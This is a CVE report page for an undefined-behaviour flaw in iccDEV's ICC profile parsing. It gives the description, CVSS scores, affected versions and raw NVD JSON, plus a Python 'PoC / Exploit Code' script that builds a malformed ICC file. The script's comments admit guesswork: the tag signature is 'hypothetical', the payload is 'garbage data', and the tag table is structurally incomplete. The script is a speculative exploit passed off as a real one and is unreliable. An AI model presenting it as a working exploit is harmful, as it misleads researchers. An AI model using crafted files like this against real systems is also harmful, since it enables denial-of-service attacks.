Security Vulnerability Report
CVE-2026-34533 CVSS 6.2 MEDIUM

Published: 2026-03-31 22:16:21
Last Modified: 2026-04-20 13:48:49

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile can trigger Undefined Behavior (UB) in CIccCalculatorFunc::ApplySequence() due to invalid enum values being loaded for icChannelFuncSignature. The issue is observable under UBSan as a “load of value … not a valid value for type icChannelFuncSignature”, indicating a type/enum value confusion scenario during ICC profile processing. This issue has been patched in version 2.3.1.6.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# This script generates a malformed ICC profile to trigger the Undefined Behavior in iccDEV < 2.3.1.6.
# The vulnerability occurs in CIccCalculatorFunc::ApplySequence() due to invalid enum values.


def generate_malformed_icc(filename):
    # ICC profile header (simplified)
    # Profile size: 128 bytes (placeholder)
    # Preferred CMM type: 0x00000000
    # Profile version: 0x04000000 (v4.0)
    # Profile/device class: 'scnr' (Input device)
    # Color space: 'RGB '
    # PCS: 'XYZ '
    # Date: [0]*12
    # Magic: 'acsp'
    # Platform: 0x00000000
    # Flags: 0x00000000
    # Manufacturer: 0x00000000
    # Model: 0x00000000
    # Attributes: 0x00000000 0x00000000
    # Rendering intent: 0x00000000
    # PCS illuminant: XYZ (0.9642, 1.0, 0.8249)
    # Creator: 0x00000000
    # Profile ID: [0]*16
    header = b''
    header += struct.pack('>I', 128)         # Size
    header += struct.pack('>I', 0)           # CMM
    header += struct.pack('>I', 0x04000000)  # Version
    header += b'scnr'                        # Class
    header += b'RGB '                        # Color Space
    header += b'XYZ '                        # PCS
    header += b'\x00' * 12                   # Date
    header += b'acsp'                        # Magic
    header += struct.pack('>I', 0)           # Platform
    header += struct.pack('>I', 0)           # Flags
    header += struct.pack('>I', 0)           # Manufacturer
    header += struct.pack('>I', 0)           # Model
    header += struct.pack('>I', 0)           # Attributes (high)
    header += struct.pack('>I', 0)           # Attributes (low)
    header += struct.pack('>I', 0)           # Rendering Intent
    # XYZ illuminant (D50)
    header += struct.pack('>i', 0x0000f6d6)  # X
    header += struct.pack('>i', 0x00010000)  # Y
    header += struct.pack('>i', 0x0000d32d)  # Z
    header += struct.pack('>I', 0)           # Creator
    header += b'\x00' * 16                   # Profile ID
    header += b'\x00' * 28                   # Reserved

    # Tag Table
    # We need a tag that triggers the calculator function sequence.
    # Let's assume a 'curv' or similar tag type processing is involved or we inject a malformed tag.
    # The specific tag type triggering CIccCalculatorFunc is implementation specific,
    # but typically involves processing curves or lut types.
    # Here we inject a tag with a signature that might be processed by the vulnerable function.
    tag_count = 1
    tag_table = b''
    tag_signature = b'mfsA'  # Hypothetical tag signature processed by calculator
    tag_offset = 128 + 12 * tag_count  # Header starts at 0, table starts at 128 (usually)
    tag_size = 20
    tag_table += tag_signature
    tag_table += struct.pack('>I', tag_offset)
    tag_table += struct.pack('>I', tag_size)

    # Tag Data
    # This data contains the invalid enum value for icChannelFuncSignature
    # The vulnerability description mentions "invalid enum values".
    # We will write garbage data to simulate the invalid value.
    tag_data = b''
    # First 4 bytes might be the type/enum
    tag_data += struct.pack('>I', 0xDEADBEEF)  # Invalid Enum Value
    tag_data += b'A' * (tag_size - 4)          # Padding

    # Combine all
    profile = header + tag_table + tag_data

    # Update header size
    profile = struct.pack('>I', len(profile)) + profile[4:]

    with open(filename, 'wb') as f:
        f.write(profile)
    print(f"Malformed ICC profile generated: {filename}")


if __name__ == "__main__":
    generate_malformed_icc("exploit.icc")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34533", "sourceIdentifier": "[email protected]", "published": "2026-03-31T22:16:20.637", "lastModified": "2026-04-20T13:48:48.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile can trigger Undefined Behavior (UB) in CIccCalculatorFunc::ApplySequence() due to invalid enum values being loaded for icChannelFuncSignature. The issue is observable under UBSan as a “load of value … not a valid value for type icChannelFuncSignature”, indicating a type/enum value confusion scenario during ICC profile processing. This issue has been patched in version 2.3.1.6."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Antes de la versión 2.3.1.6, un perfil ICC manipulado puede desencadenar Comportamiento Indefinido (UB) en CIccCalculatorFunc::ApplySequence() debido a la carga de valores de enumeración (enum) no válidos para icChannelFuncSignature. El problema es observable bajo UBSan como una 'carga de valor... no es un valor válido para el tipo icChannelFuncSignature', lo que indica un escenario de confusión de valores de tipo/enumeración (enum) durante el procesamiento de perfiles ICC. Este problema ha sido parcheado en la versión 2.3.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-758"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.6", "matchCriteriaId": "DE133F29-9592-4669-8B76-9F7C88EFE17D"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/664", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/681", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-8jj3-77m7-c3pq", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}